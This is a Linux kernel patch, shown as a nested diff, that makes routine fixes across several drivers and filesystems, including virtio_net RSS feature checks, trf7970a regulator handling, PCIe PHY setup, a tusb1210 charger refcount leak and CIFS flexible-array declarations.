+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 45f1a871b7da8..32cddb633793d 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -2948,19 +2948,35 @@ static int virtnet_get_rxfh(struct net_device *dev, u32 *indir, u8 *key, u8 *hfu
+ static int virtnet_set_rxfh(struct net_device *dev, const u32 *indir, const u8 *key, const u8 hfunc)
+ {
+ 	struct virtnet_info *vi = netdev_priv(dev);
++	bool update = false;
+ 	int i;
+ 
+ 	if (hfunc != ETH_RSS_HASH_NO_CHANGE && hfunc != ETH_RSS_HASH_TOP)
+ 		return -EOPNOTSUPP;
+ 
+ 	if (indir) {
++		if (!vi->has_rss)
++			return -EOPNOTSUPP;
++
+ 		for (i = 0; i < vi->rss_indir_table_size; ++i)
+ 			vi->ctrl->rss.indirection_table[i] = indir[i];
++		update = true;
+ 	}
+-	if (key)
++
++	if (key) {
++		/* If either _F_HASH_REPORT or _F_RSS are negotiated, the
++		 * device provides hash calculation capabilities, that is,
++		 * hash_key is configured.
++		 */
++		if (!vi->has_rss && !vi->has_rss_hash_report)
++			return -EOPNOTSUPP;
++
+ 		memcpy(vi->ctrl->rss.key, key, vi->rss_key_size);
++		update = true;
++	}
+ 
+-	virtnet_commit_rss_command(vi);
++	if (update)
++		virtnet_commit_rss_command(vi);
+ 
+ 	return 0;
+ }
+@@ -3852,13 +3868,15 @@ static int virtnet_probe(struct virtio_device *vdev)
+ 	if (virtio_has_feature(vdev, VIRTIO_NET_F_HASH_REPORT))
+ 		vi->has_rss_hash_report = true;
+ 
+-	if (virtio_has_feature(vdev, VIRTIO_NET_F_RSS))
++	if (virtio_has_feature(vdev, VIRTIO_NET_F_RSS)) {
+ 		vi->has_rss = true;
+ 
+-	if (vi->has_rss || vi->has_rss_hash_report) {
+ 		vi->rss_indir_table_size =
+ 			virtio_cread16(vdev, offsetof(struct virtio_net_config,
+ 				rss_max_indirection_table_length));
++	}
++
++	if (vi->has_rss || vi->has_rss_hash_report) {
+ 		vi->rss_key_size =
+ 			virtio_cread8(vdev, offsetof(struct virtio_net_config, rss_max_key_size));
+ 
+diff --git a/drivers/net/vxlan/vxlan_core.c b/drivers/net/vxlan/vxlan_core.c
+index 619dd71c9d75e..fbd36dff9ec27 100644
+--- a/drivers/net/vxlan/vxlan_core.c
++++ b/drivers/net/vxlan/vxlan_core.c
+@@ -1662,6 +1662,10 @@ static bool vxlan_set_mac(struct vxlan_dev *vxlan,
+ 	if (ether_addr_equal(eth_hdr(skb)->h_source, vxlan->dev->dev_addr))
+ 		return false;
+ 
++	/* Ignore packets from invalid src-address */
++	if (!is_valid_ether_addr(eth_hdr(skb)->h_source))
++		return false;
++
+ 	/* Get address from the outer IP header */
+ 	if (vxlan_get_sk_family(vs) == AF_INET) {
+ 		saddr.sin.sin_addr.s_addr = ip_hdr(skb)->saddr;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/ftm-initiator.c b/drivers/net/wireless/intel/iwlwifi/mvm/ftm-initiator.c
+index 8c5b97fb19414..5b0b4bb2bb684 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/ftm-initiator.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/ftm-initiator.c
+@@ -48,6 +48,8 @@ int iwl_mvm_ftm_add_pasn_sta(struct iwl_mvm *mvm, struct ieee80211_vif *vif,
+ 	if (!pasn)
+ 		return -ENOBUFS;
+ 
++	iwl_mvm_ftm_remove_pasn_sta(mvm, addr);
++
+ 	pasn->cipher = iwl_mvm_cipher_to_location_cipher(cipher);
+ 
+ 	switch (pasn->cipher) {
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+index acd8803dbcdd6..b20d64dbba1ad 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+@@ -2650,7 +2650,8 @@ static int iwl_mvm_build_scan_cmd(struct iwl_mvm *mvm,
+ 		if (ver_handler->version != scan_ver)
+ 			continue;
+ 
+-		return ver_handler->handler(mvm, vif, params, type, uid);
++		err = ver_handler->handler(mvm, vif, params, type, uid);
++		return err ? : uid;
+ 	}
+ 
+ 	err = iwl_mvm_scan_umac(mvm, vif, params, type, uid);
+diff --git a/drivers/nfc/trf7970a.c b/drivers/nfc/trf7970a.c
+index 21d68664fe082..7968baa626d16 100644
+--- a/drivers/nfc/trf7970a.c
++++ b/drivers/nfc/trf7970a.c
+@@ -424,7 +424,8 @@ struct trf7970a {
+ 	enum trf7970a_state		state;
+ 	struct device			*dev;
+ 	struct spi_device		*spi;
+-	struct regulator		*regulator;
++	struct regulator		*vin_regulator;
++	struct regulator		*vddio_regulator;
+ 	struct nfc_digital_dev		*ddev;
+ 	u32				quirks;
+ 	bool				is_initiator;
+@@ -1883,7 +1884,7 @@ static int trf7970a_power_up(struct trf7970a *trf)
+ 	if (trf->state != TRF7970A_ST_PWR_OFF)
+ 		return 0;
+ 
+-	ret = regulator_enable(trf->regulator);
++	ret = regulator_enable(trf->vin_regulator);
+ 	if (ret) {
+ 		dev_err(trf->dev, "%s - Can't enable VIN: %d\n", __func__, ret);
+ 		return ret;
+@@ -1926,7 +1927,7 @@ static int trf7970a_power_down(struct trf7970a *trf)
+ 	if (trf->en2_gpiod && !(trf->quirks & TRF7970A_QUIRK_EN2_MUST_STAY_LOW))
+ 		gpiod_set_value_cansleep(trf->en2_gpiod, 0);
+ 
+-	ret = regulator_disable(trf->regulator);
++	ret = regulator_disable(trf->vin_regulator);
+ 	if (ret)
+ 		dev_err(trf->dev, "%s - Can't disable VIN: %d\n", __func__,
+ 			ret);
+@@ -2065,37 +2066,37 @@ static int trf7970a_probe(struct spi_device *spi)
+ 	mutex_init(&trf->lock);
+ 	INIT_DELAYED_WORK(&trf->timeout_work, trf7970a_timeout_work_handler);
+ 
+-	trf->regulator = devm_regulator_get(&spi->dev, "vin");
+-	if (IS_ERR(trf->regulator)) {
+-		ret = PTR_ERR(trf->regulator);
++	trf->vin_regulator = devm_regulator_get(&spi->dev, "vin");
++	if (IS_ERR(trf->vin_regulator)) {
++		ret = PTR_ERR(trf->vin_regulator);
+ 		dev_err(trf->dev, "Can't get VIN regulator: %d\n", ret);
+ 		goto err_destroy_lock;
+ 	}
+ 
+-	ret = regulator_enable(trf->regulator);
++	ret = regulator_enable(trf->vin_regulator);
+ 	if (ret) {
+ 		dev_err(trf->dev, "Can't enable VIN: %d\n", ret);
+ 		goto err_destroy_lock;
+ 	}
+ 
+-	uvolts = regulator_get_voltage(trf->regulator);
++	uvolts = regulator_get_voltage(trf->vin_regulator);
+ 	if (uvolts > 4000000)
+ 		trf->chip_status_ctrl = TRF7970A_CHIP_STATUS_VRS5_3;
+ 
+-	trf->regulator = devm_regulator_get(&spi->dev, "vdd-io");
+-	if (IS_ERR(trf->regulator)) {
+-		ret = PTR_ERR(trf->regulator);
++	trf->vddio_regulator = devm_regulator_get(&spi->dev, "vdd-io");
++	if (IS_ERR(trf->vddio_regulator)) {
++		ret = PTR_ERR(trf->vddio_regulator);
+ 		dev_err(trf->dev, "Can't get VDD_IO regulator: %d\n", ret);
+-		goto err_destroy_lock;
++		goto err_disable_vin_regulator;
+ 	}
+ 
+-	ret = regulator_enable(trf->regulator);
++	ret = regulator_enable(trf->vddio_regulator);
+ 	if (ret) {
+ 		dev_err(trf->dev, "Can't enable VDD_IO: %d\n", ret);
+-		goto err_destroy_lock;
++		goto err_disable_vin_regulator;
+ 	}
+ 
+-	if (regulator_get_voltage(trf->regulator) == 1800000) {
++	if (regulator_get_voltage(trf->vddio_regulator) == 1800000) {
+ 		trf->io_ctrl = TRF7970A_REG_IO_CTRL_IO_LOW;
+ 		dev_dbg(trf->dev, "trf7970a config vdd_io to 1.8V\n");
+ 	}
+@@ -2108,7 +2109,7 @@ static int trf7970a_probe(struct spi_device *spi)
+ 	if (!trf->ddev) {
+ 		dev_err(trf->dev, "Can't allocate NFC digital device\n");
+ 		ret = -ENOMEM;
+-		goto err_disable_regulator;
++		goto err_disable_vddio_regulator;
+ 	}
+ 
+ 	nfc_digital_set_parent_dev(trf->ddev, trf->dev);
+@@ -2137,8 +2138,10 @@ static int trf7970a_probe(struct spi_device *spi)
+ 	trf7970a_shutdown(trf);
+ err_free_ddev:
+ 	nfc_digital_free_device(trf->ddev);
+-err_disable_regulator:
+-	regulator_disable(trf->regulator);
++err_disable_vddio_regulator:
++	regulator_disable(trf->vddio_regulator);
++err_disable_vin_regulator:
++	regulator_disable(trf->vin_regulator);
+ err_destroy_lock:
+ 	mutex_destroy(&trf->lock);
+ 	return ret;
+@@ -2157,7 +2160,8 @@ static void trf7970a_remove(struct spi_device *spi)
+ 	nfc_digital_unregister_device(trf->ddev);
+ 	nfc_digital_free_device(trf->ddev);
+ 
+-	regulator_disable(trf->regulator);
++	regulator_disable(trf->vddio_regulator);
++	regulator_disable(trf->vin_regulator);
+ 
+ 	mutex_destroy(&trf->lock);
+ }
+diff --git a/drivers/phy/freescale/phy-fsl-imx8m-pcie.c b/drivers/phy/freescale/phy-fsl-imx8m-pcie.c
+index c93286483b425..211ce84d980f9 100644
+--- a/drivers/phy/freescale/phy-fsl-imx8m-pcie.c
++++ b/drivers/phy/freescale/phy-fsl-imx8m-pcie.c
+@@ -11,6 +11,7 @@
+ #include <linux/mfd/syscon.h>
+ #include <linux/mfd/syscon/imx7-iomuxc-gpr.h>
+ #include <linux/module.h>
++#include <linux/of_device.h>
+ #include <linux/phy/phy.h>
+ #include <linux/platform_device.h>
+ #include <linux/regmap.h>
+@@ -47,6 +48,15 @@
+ #define IMX8MM_GPR_PCIE_SSC_EN		BIT(16)
+ #define IMX8MM_GPR_PCIE_AUX_EN_OVERRIDE	BIT(9)
+ 
++enum imx8_pcie_phy_type {
++	IMX8MM,
++};
++
++struct imx8_pcie_phy_drvdata {
++	const	char			*gpr;
++	enum	imx8_pcie_phy_type	variant;
++};
++
+ struct imx8_pcie_phy {
+ 	void __iomem		*base;
+ 	struct clk		*clk;
+@@ -57,6 +67,7 @@ struct imx8_pcie_phy {
+ 	u32			tx_deemph_gen1;
+ 	u32			tx_deemph_gen2;
+ 	bool			clkreq_unused;
++	const struct imx8_pcie_phy_drvdata	*drvdata;
+ };
+ 
+ static int imx8_pcie_phy_power_on(struct phy *phy)
+@@ -68,31 +79,17 @@ static int imx8_pcie_phy_power_on(struct phy *phy)
+ 	reset_control_assert(imx8_phy->reset);
+ 
+ 	pad_mode = imx8_phy->refclk_pad_mode;
+-	/* Set AUX_EN_OVERRIDE 1'b0, when the CLKREQ# isn't hooked */
+-	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
+-			   IMX8MM_GPR_PCIE_AUX_EN_OVERRIDE,
+-			   imx8_phy->clkreq_unused ?
+-			   0 : IMX8MM_GPR_PCIE_AUX_EN_OVERRIDE);
+-	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
+-			   IMX8MM_GPR_PCIE_AUX_EN,
+-			   IMX8MM_GPR_PCIE_AUX_EN);
+-	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
+-			   IMX8MM_GPR_PCIE_POWER_OFF, 0);
+-	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
+-			   IMX8MM_GPR_PCIE_SSC_EN, 0);
+-
+-	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
+-			   IMX8MM_GPR_PCIE_REF_CLK_SEL,
+-			   pad_mode == IMX8_PCIE_REFCLK_PAD_INPUT ?
+-			   IMX8MM_GPR_PCIE_REF_CLK_EXT :
+-			   IMX8MM_GPR_PCIE_REF_CLK_PLL);
+-	usleep_range(100, 200);
+-
+-	/* Do the PHY common block reset */
+-	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
+-			   IMX8MM_GPR_PCIE_CMN_RST,
+-			   IMX8MM_GPR_PCIE_CMN_RST);
+-	usleep_range(200, 500);
++	switch (imx8_phy->drvdata->variant) {
++	case IMX8MM:
++		/* Tune PHY de-emphasis setting to pass PCIe compliance. */
++		if (imx8_phy->tx_deemph_gen1)
++			writel(imx8_phy->tx_deemph_gen1,
++			       imx8_phy->base + PCIE_PHY_TRSV_REG5);
++		if (imx8_phy->tx_deemph_gen2)
++			writel(imx8_phy->tx_deemph_gen2,
++			       imx8_phy->base + PCIE_PHY_TRSV_REG6);
++		break;
++	}
+ 
+ 	if (pad_mode == IMX8_PCIE_REFCLK_PAD_INPUT ||
+ 	    pad_mode == IMX8_PCIE_REFCLK_PAD_UNUSED) {
+@@ -111,8 +108,10 @@ static int imx8_pcie_phy_power_on(struct phy *phy)
+ 		/* Source clock from SoC internal PLL */
+ 		writel(ANA_PLL_CLK_OUT_TO_EXT_IO_SEL,
+ 		       imx8_phy->base + IMX8MM_PCIE_PHY_CMN_REG062);
+-		writel(AUX_PLL_REFCLK_SEL_SYS_PLL,
+-		       imx8_phy->base + IMX8MM_PCIE_PHY_CMN_REG063);
++		if (imx8_phy->drvdata->variant != IMX8MM) {
++			writel(AUX_PLL_REFCLK_SEL_SYS_PLL,
++			       imx8_phy->base + IMX8MM_PCIE_PHY_CMN_REG063);
++		}
+ 		val = ANA_AUX_RX_TX_SEL_TX | ANA_AUX_TX_TERM;
+ 		writel(val | ANA_AUX_RX_TERM_GND_EN,
+ 		       imx8_phy->base + IMX8MM_PCIE_PHY_CMN_REG064);
+@@ -120,15 +119,37 @@ static int imx8_pcie_phy_power_on(struct phy *phy)
+ 		       imx8_phy->base + IMX8MM_PCIE_PHY_CMN_REG065);
+ 	}
+ 
+-	/* Tune PHY de-emphasis setting to pass PCIe compliance. */
+-	if (imx8_phy->tx_deemph_gen1)
+-		writel(imx8_phy->tx_deemph_gen1,
+-		       imx8_phy->base + PCIE_PHY_TRSV_REG5);
+-	if (imx8_phy->tx_deemph_gen2)
+-		writel(imx8_phy->tx_deemph_gen2,
+-		       imx8_phy->base + PCIE_PHY_TRSV_REG6);
++	/* Set AUX_EN_OVERRIDE 1'b0, when the CLKREQ# isn't hooked */
++	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
++			   IMX8MM_GPR_PCIE_AUX_EN_OVERRIDE,
++			   imx8_phy->clkreq_unused ?
++			   0 : IMX8MM_GPR_PCIE_AUX_EN_OVERRIDE);
++	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
++			   IMX8MM_GPR_PCIE_AUX_EN,
++			   IMX8MM_GPR_PCIE_AUX_EN);
++	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
++			   IMX8MM_GPR_PCIE_POWER_OFF, 0);
++	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
++			   IMX8MM_GPR_PCIE_SSC_EN, 0);
+ 
+-	reset_control_deassert(imx8_phy->reset);
++	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
++			   IMX8MM_GPR_PCIE_REF_CLK_SEL,
++			   pad_mode == IMX8_PCIE_REFCLK_PAD_INPUT ?
++			   IMX8MM_GPR_PCIE_REF_CLK_EXT :
++			   IMX8MM_GPR_PCIE_REF_CLK_PLL);
++	usleep_range(100, 200);
++
++	/* Do the PHY common block reset */
++	regmap_update_bits(imx8_phy->iomuxc_gpr, IOMUXC_GPR14,
++			   IMX8MM_GPR_PCIE_CMN_RST,
++			   IMX8MM_GPR_PCIE_CMN_RST);
++
++	switch (imx8_phy->drvdata->variant) {
++	case IMX8MM:
++		reset_control_deassert(imx8_phy->reset);
++		usleep_range(200, 500);
++		break;
++	}
+ 
+ 	/* Polling to check the phy is ready or not. */
+ 	ret = readl_poll_timeout(imx8_phy->base + IMX8MM_PCIE_PHY_CMN_REG75,
+@@ -160,6 +181,17 @@ static const struct phy_ops imx8_pcie_phy_ops = {
+ 	.owner		= THIS_MODULE,
+ };
+ 
++static const struct imx8_pcie_phy_drvdata imx8mm_drvdata = {
++	.gpr = "fsl,imx8mm-iomuxc-gpr",
++	.variant = IMX8MM,
++};
++
++static const struct of_device_id imx8_pcie_phy_of_match[] = {
++	{.compatible = "fsl,imx8mm-pcie-phy", .data = &imx8mm_drvdata, },
++	{ },
++};
++MODULE_DEVICE_TABLE(of, imx8_pcie_phy_of_match);
++
+ static int imx8_pcie_phy_probe(struct platform_device *pdev)
+ {
+ 	struct phy_provider *phy_provider;
+@@ -172,6 +204,8 @@ static int imx8_pcie_phy_probe(struct platform_device *pdev)
+ 	if (!imx8_phy)
+ 		return -ENOMEM;
+ 
++	imx8_phy->drvdata = of_device_get_match_data(dev);
++
+ 	/* get PHY refclk pad mode */
+ 	of_property_read_u32(np, "fsl,refclk-pad-mode",
+ 			     &imx8_phy->refclk_pad_mode);
+@@ -197,7 +231,7 @@ static int imx8_pcie_phy_probe(struct platform_device *pdev)
+ 
+ 	/* Grab GPR config register range */
+ 	imx8_phy->iomuxc_gpr =
+-		 syscon_regmap_lookup_by_compatible("fsl,imx6q-iomuxc-gpr");
++		 syscon_regmap_lookup_by_compatible(imx8_phy->drvdata->gpr);
+ 	if (IS_ERR(imx8_phy->iomuxc_gpr)) {
+ 		dev_err(dev, "unable to find iomuxc registers\n");
+ 		return PTR_ERR(imx8_phy->iomuxc_gpr);
+@@ -225,12 +259,6 @@ static int imx8_pcie_phy_probe(struct platform_device *pdev)
+ 	return PTR_ERR_OR_ZERO(phy_provider);
+ }
+ 
+-static const struct of_device_id imx8_pcie_phy_of_match[] = {
+-	{.compatible = "fsl,imx8mm-pcie-phy",},
+-	{ },
+-};
+-MODULE_DEVICE_TABLE(of, imx8_pcie_phy_of_match);
+-
+ static struct platform_driver imx8_pcie_phy_driver = {
+ 	.probe	= imx8_pcie_phy_probe,
+ 	.driver = {
+diff --git a/drivers/phy/marvell/phy-mvebu-a3700-comphy.c b/drivers/phy/marvell/phy-mvebu-a3700-comphy.c
+index d641b345afa35..251e1aedd4a6e 100644
+--- a/drivers/phy/marvell/phy-mvebu-a3700-comphy.c
++++ b/drivers/phy/marvell/phy-mvebu-a3700-comphy.c
+@@ -602,7 +602,7 @@ static void comphy_gbe_phy_init(struct mvebu_a3700_comphy_lane *lane,
+ 	u16 val;
+ 
+ 	fix_idx = 0;
+-	for (addr = 0; addr < 512; addr++) {
++	for (addr = 0; addr < ARRAY_SIZE(gbe_phy_init); addr++) {
+ 		/*
+ 		 * All PHY register values are defined in full for 3.125Gbps
+ 		 * SERDES speed. The values required for 1.25 Gbps are almost
+@@ -610,11 +610,12 @@ static void comphy_gbe_phy_init(struct mvebu_a3700_comphy_lane *lane,
+ 		 * comparison to 3.125 Gbps values. These register values are
+ 		 * stored in "gbe_phy_init_fix" array.
+ 		 */
+-		if (!is_1gbps && gbe_phy_init_fix[fix_idx].addr == addr) {
++		if (!is_1gbps &&
++		    fix_idx < ARRAY_SIZE(gbe_phy_init_fix) &&
++		    gbe_phy_init_fix[fix_idx].addr == addr) {
+ 			/* Use new value */
+ 			val = gbe_phy_init_fix[fix_idx].value;
+-			if (fix_idx < ARRAY_SIZE(gbe_phy_init_fix))
+-				fix_idx++;
++			fix_idx++;
+ 		} else {
+ 			val = gbe_phy_init[addr];
+ 		}
+diff --git a/drivers/phy/rockchip/phy-rockchip-snps-pcie3.c b/drivers/phy/rockchip/phy-rockchip-snps-pcie3.c
+index 1d355b32ba559..c6aa6bc69e900 100644
+--- a/drivers/phy/rockchip/phy-rockchip-snps-pcie3.c
++++ b/drivers/phy/rockchip/phy-rockchip-snps-pcie3.c
+@@ -39,6 +39,8 @@
+ #define RK3588_BIFURCATION_LANE_0_1		BIT(0)
+ #define RK3588_BIFURCATION_LANE_2_3		BIT(1)
+ #define RK3588_LANE_AGGREGATION		BIT(2)
++#define RK3588_PCIE1LN_SEL_EN			(GENMASK(1, 0) << 16)
++#define RK3588_PCIE30_PHY_MODE_EN		(GENMASK(2, 0) << 16)
+ 
+ struct rockchip_p3phy_ops;
+ 
+@@ -131,7 +133,7 @@ static const struct rockchip_p3phy_ops rk3568_ops = {
+ static int rockchip_p3phy_rk3588_init(struct rockchip_p3phy_priv *priv)
+ {
+ 	u32 reg = 0;
+-	u8 mode = 0;
++	u8 mode = RK3588_LANE_AGGREGATION; /* default */
+ 	int ret;
+ 
+ 	/* Deassert PCIe PMA output clamp mode */
+@@ -139,31 +141,24 @@ static int rockchip_p3phy_rk3588_init(struct rockchip_p3phy_priv *priv)
+ 
+ 	/* Set bifurcation if needed */
+ 	for (int i = 0; i < priv->num_lanes; i++) {
+-		if (!priv->lanes[i])
+-			mode |= (BIT(i) << 3);
+-
+ 		if (priv->lanes[i] > 1)
+-			mode |= (BIT(i) >> 1);
+-	}
+-
+-	if (!mode)
+-		reg = RK3588_LANE_AGGREGATION;
+-	else {
+-		if (mode & (BIT(0) | BIT(1)))
+-			reg |= RK3588_BIFURCATION_LANE_0_1;
+-
+-		if (mode & (BIT(2) | BIT(3)))
+-			reg |= RK3588_BIFURCATION_LANE_2_3;
++			mode &= ~RK3588_LANE_AGGREGATION;
++		if (priv->lanes[i] == 3)
++			mode |= RK3588_BIFURCATION_LANE_0_1;
++		if (priv->lanes[i] == 4)
++			mode |= RK3588_BIFURCATION_LANE_2_3;
+ 	}
+ 
+-	regmap_write(priv->phy_grf, RK3588_PCIE3PHY_GRF_CMN_CON0, (0x7<<16) | reg);
++	reg = mode;
++	regmap_write(priv->phy_grf, RK3588_PCIE3PHY_GRF_CMN_CON0,
++		     RK3588_PCIE30_PHY_MODE_EN | reg);
+ 
+ 	/* Set pcie1ln_sel in PHP_GRF_PCIESEL_CON */
+ 	if (!IS_ERR(priv->pipe_grf)) {
+-		reg = (mode & (BIT(6) | BIT(7))) >> 6;
++		reg = mode & (RK3588_BIFURCATION_LANE_0_1 | RK3588_BIFURCATION_LANE_2_3);
+ 		if (reg)
+ 			regmap_write(priv->pipe_grf, PHP_GRF_PCIESEL_CON,
+-				     (reg << 16) | reg);
++				     RK3588_PCIE1LN_SEL_EN | reg);
+ 	}
+ 
+ 	reset_control_deassert(priv->p30phy);
+diff --git a/drivers/phy/ti/phy-tusb1210.c b/drivers/phy/ti/phy-tusb1210.c
+index 669c13d6e402f..bdd44ec3e8098 100644
+--- a/drivers/phy/ti/phy-tusb1210.c
++++ b/drivers/phy/ti/phy-tusb1210.c
+@@ -64,7 +64,6 @@ struct tusb1210 {
+ 	struct delayed_work chg_det_work;
+ 	struct notifier_block psy_nb;
+ 	struct power_supply *psy;
+-	struct power_supply *charger;
+ #endif
+ };
+ 
+@@ -230,19 +229,24 @@ static const char * const tusb1210_chargers[] = {
+ 
+ static bool tusb1210_get_online(struct tusb1210 *tusb)
+ {
++	struct power_supply *charger = NULL;
+ 	union power_supply_propval val;
+-	int i;
++	bool online = false;
++	int i, ret;
+ 
+-	for (i = 0; i < ARRAY_SIZE(tusb1210_chargers) && !tusb->charger; i++)
+-		tusb->charger = power_supply_get_by_name(tusb1210_chargers[i]);
++	for (i = 0; i < ARRAY_SIZE(tusb1210_chargers) && !charger; i++)
++		charger = power_supply_get_by_name(tusb1210_chargers[i]);
+ 
+-	if (!tusb->charger)
++	if (!charger)
+ 		return false;
+ 
+-	if (power_supply_get_property(tusb->charger, POWER_SUPPLY_PROP_ONLINE, &val))
+-		return false;
++	ret = power_supply_get_property(charger, POWER_SUPPLY_PROP_ONLINE, &val);
++	if (ret == 0)
++		online = val.intval;
++
++	power_supply_put(charger);
+ 
+-	return val.intval;
++	return online;
+ }
+ 
+ static void tusb1210_chg_det_work(struct work_struct *work)
+@@ -466,9 +470,6 @@ static void tusb1210_remove_charger_detect(struct tusb1210 *tusb)
+ 		cancel_delayed_work_sync(&tusb->chg_det_work);
+ 		power_supply_unregister(tusb->psy);
+ 	}
+-
+-	if (tusb->charger)
+-		power_supply_put(tusb->charger);
+ }
+ #else
+ static void tusb1210_probe_charger_detect(struct tusb1210 *tusb) { }
+diff --git a/drivers/video/fbdev/core/fb_defio.c b/drivers/video/fbdev/core/fb_defio.c
+index 49883c8012e60..3b376345d4d47 100644
+--- a/drivers/video/fbdev/core/fb_defio.c
++++ b/drivers/video/fbdev/core/fb_defio.c
+@@ -200,7 +200,7 @@ static vm_fault_t fb_deferred_io_track_page(struct fb_info *info, unsigned long
+  */
+ static vm_fault_t fb_deferred_io_page_mkwrite(struct fb_info *info, struct vm_fault *vmf)
+ {
+-	unsigned long offset = vmf->address - vmf->vma->vm_start;
++	unsigned long offset = vmf->pgoff << PAGE_SHIFT;
+ 	struct page *page = vmf->page;
+ 
+ 	file_update_time(vmf->vma->vm_file);
+diff --git a/fs/btrfs/backref.c b/fs/btrfs/backref.c
+index 18cf801ab5908..23d0372e88821 100644
+--- a/fs/btrfs/backref.c
++++ b/fs/btrfs/backref.c
+@@ -2475,20 +2475,14 @@ struct btrfs_data_container *init_data_container(u32 total_bytes)
+ 	size_t alloc_bytes;
+ 
+ 	alloc_bytes = max_t(size_t, total_bytes, sizeof(*data));
+-	data = kvmalloc(alloc_bytes, GFP_KERNEL);
++	data = kvzalloc(alloc_bytes, GFP_KERNEL);
+ 	if (!data)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	if (total_bytes >= sizeof(*data)) {
++	if (total_bytes >= sizeof(*data))
+ 		data->bytes_left = total_bytes - sizeof(*data);
+-		data->bytes_missing = 0;
+-	} else {
++	else
+ 		data->bytes_missing = sizeof(*data) - total_bytes;
+-		data->bytes_left = 0;
+-	}
+-
+-	data->elem_cnt = 0;
+-	data->elem_missed = 0;
+ 
+ 	return data;
+ }
+diff --git a/fs/smb/client/cifs_spnego.h b/fs/smb/client/cifs_spnego.h
+index 7f102ffeb6750..e4d751b0c8127 100644
+--- a/fs/smb/client/cifs_spnego.h
++++ b/fs/smb/client/cifs_spnego.h
+@@ -24,7 +24,7 @@ struct cifs_spnego_msg {
+ 	uint32_t	flags;
+ 	uint32_t	sesskey_len;
+ 	uint32_t	secblob_len;
+-	uint8_t		data[1];
++	uint8_t		data[];
+ };
+ 
+ #ifdef __KERNEL__
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index 0a79771c8f33b..f0a3336ffb6c8 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -387,6 +387,7 @@ cifs_alloc_inode(struct super_block *sb)
+ 	 * server, can not assume caching of file data or metadata.
+ 	 */
+ 	cifs_set_oplock_level(cifs_inode, 0);
++	cifs_inode->lease_granted = false;
+ 	cifs_inode->flags = 0;
+ 	spin_lock_init(&cifs_inode->writers_lock);
+ 	cifs_inode->writers = 0;
+diff --git a/fs/smb/client/cifspdu.h b/fs/smb/client/cifspdu.h
+index 97bb1838555b4..9cb4577063344 100644
+--- a/fs/smb/client/cifspdu.h
++++ b/fs/smb/client/cifspdu.h
+@@ -562,7 +562,7 @@ typedef union smb_com_session_setup_andx {
+ 		__u32 Reserved;
+ 		__le32 Capabilities;	/* see below */
+ 		__le16 ByteCount;
+-		unsigned char SecurityBlob[1];	/* followed by */
++		unsigned char SecurityBlob[];	/* followed by */
+ 		/* STRING NativeOS */
+ 		/* STRING NativeLanMan */
+ 	} __attribute__((packed)) req;	/* NTLM request format (with
+@@ -582,7 +582,7 @@ typedef union smb_com_session_setup_andx {
+ 		__u32 Reserved;	/* see below */
+ 		__le32 Capabilities;
+ 		__le16 ByteCount;
+-		unsigned char CaseInsensitivePassword[1];     /* followed by: */
++		unsigned char CaseInsensitivePassword[];     /* followed by: */
+ 		/* unsigned char * CaseSensitivePassword; */
+ 		/* STRING AccountName */
+ 		/* STRING PrimaryDomain */
+@@ -599,7 +599,7 @@ typedef union smb_com_session_setup_andx {
+ 		__le16 Action;	/* see below */
+ 		__le16 SecurityBlobLength;
+ 		__u16 ByteCount;
+-		unsigned char SecurityBlob[1];	/* followed by */
++		unsigned char SecurityBlob[];	/* followed by */
+ /*      unsigned char  * NativeOS;      */
+ /*	unsigned char  * NativeLanMan;  */
+ /*      unsigned char  * PrimaryDomain; */
+@@ -618,7 +618,7 @@ typedef union smb_com_session_setup_andx {
+ 		__le16 PasswordLength;
+ 		__u32 Reserved; /* encrypt key len and offset */
+ 		__le16 ByteCount;
+-		unsigned char AccountPassword[1];	/* followed by */
++		unsigned char AccountPassword[];	/* followed by */
+ 		/* STRING AccountName */
+ 		/* STRING PrimaryDomain */
+ 		/* STRING NativeOS */
+@@ -632,7 +632,7 @@ typedef union smb_com_session_setup_andx {
+ 		__le16 AndXOffset;
+ 		__le16 Action;	/* see below */
+ 		__u16 ByteCount;
+-		unsigned char NativeOS[1];	/* followed by */
++		unsigned char NativeOS[];	/* followed by */
+ /*	unsigned char * NativeLanMan; */
+ /*      unsigned char * PrimaryDomain; */
+ 	} __attribute__((packed)) old_resp; /* pre-NTLM (LANMAN2.1) response */
+@@ -693,7 +693,7 @@ typedef struct smb_com_tconx_req {
+ 	__le16 Flags;		/* see below */
+ 	__le16 PasswordLength;
+ 	__le16 ByteCount;
+-	unsigned char Password[1];	/* followed by */
++	unsigned char Password[];	/* followed by */
+ /* STRING Path    *//* \\server\share name */
+ 	/* STRING Service */
+ } __attribute__((packed)) TCONX_REQ;
+@@ -705,7 +705,7 @@ typedef struct smb_com_tconx_rsp {
+ 	__le16 AndXOffset;
+ 	__le16 OptionalSupport;	/* see below */
+ 	__u16 ByteCount;
+-	unsigned char Service[1];	/* always ASCII, not Unicode */
++	unsigned char Service[];	/* always ASCII, not Unicode */
+ 	/* STRING NativeFileSystem */
+ } __attribute__((packed)) TCONX_RSP;
+ 
